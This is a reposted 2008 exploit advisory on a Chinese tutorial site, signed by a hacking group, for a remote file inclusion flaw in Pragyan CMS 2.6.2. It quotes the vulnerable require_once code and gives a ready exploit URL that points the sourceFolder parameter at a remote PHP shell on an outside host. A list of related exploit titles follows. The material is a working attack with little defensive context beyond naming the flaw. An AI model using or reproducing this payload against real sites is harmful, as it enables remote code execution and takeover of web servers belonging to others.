手机
当前位置:查字典教程网 >网络安全 >Exploit >Pragyan CMS 2.6.2 (sourceFolder) Remote File Inclusion Vulnerability
Pragyan CMS 2.6.2 (sourceFolder) Remote File Inclusion Vulnerability
摘要:--------------------------------------------------------------[Persian...

<< In The Name Of GOD >>

-------------------------------------------------------------

- [ Persian Boys Hacking Team ] -:- 2008

-

- discovered by N3TR00T3R [at] Y! [dot] com

- pragyan 2.6.2 Remote File Includion

- download :http://sourceforge.net/project/showfiles.php?group_id=220286

- sp tnx : Sp3shial,Veroonic4,God_Master_hacker,a_reptil,Ciph3r,shayan_cmd

r00t.master,Dr.root,Pouya_server,Spyn3t,LordKourosh,123qwe,mr.n4ser

Zahacker,goli_boya,i_reza_i,programer, and all irchatan members ...

[www.Persian-Boys.com] & [www.irchatan.com]

--------------------------------------------------------------

if register_globals = On;

Vul Code : [/cms/modules/form.lib.php]

##########################################################

#global $sourceFolder;

#global $moduleFolder;

#require_once("$sourceFolder/$moduleFolder/form/editform.php");

#require_once("$sourceFolder/$moduleFolder/form/editformelement.php");

#require_once("$sourceFolder/$moduleFolder/form/registrationformgenerate.php");

#require_once("$sourceFolder/$moduleFolder/form/registrationformsubmit.php");

#require_once("$sourceFolder/$moduleFolder/form/viewregistrants.php");

##########################################################

Exploit :

##########################################################

#

# www.target.com/path/cms/modules/form.lib.php?sourceFolder=http://shell.own3r.by.ru/syn99.php?

#

##########################################################

【Pragyan CMS 2.6.2 (sourceFolder) Remote File Inclusion Vulnerability】相关文章:

Joomla Component DT Register Remote SQL injection Vulnerability

fuzzylime cms 3.01 (commrss.php) Remote Code Execution Exploit

Maian Music 1.0 Insecure Cookie Handling Vulnerability

Boonex Dolphin 6.1.2 Multiple Remote File Inclusion Vulnerabilities

WebCMS Portal Edition (id) Remote SQL Injection Vulnerability

BoonEx Ray 3.5 (sIncPath) Remote File Inclusion Vulnerability

Maian Events 2.0 Insecure Cookie Handling Vulnerability

trixbox (langChoice) Local File Inclusion Exploit (connect-back)

Ultra Office ActiveX Control Remote Arbitrary File Corruption Exploit

Million Pixels 3 (id_cat) Remote SQL Injection Vulnerability

上一篇: Comdev Web Blogger
精品推荐
分类导航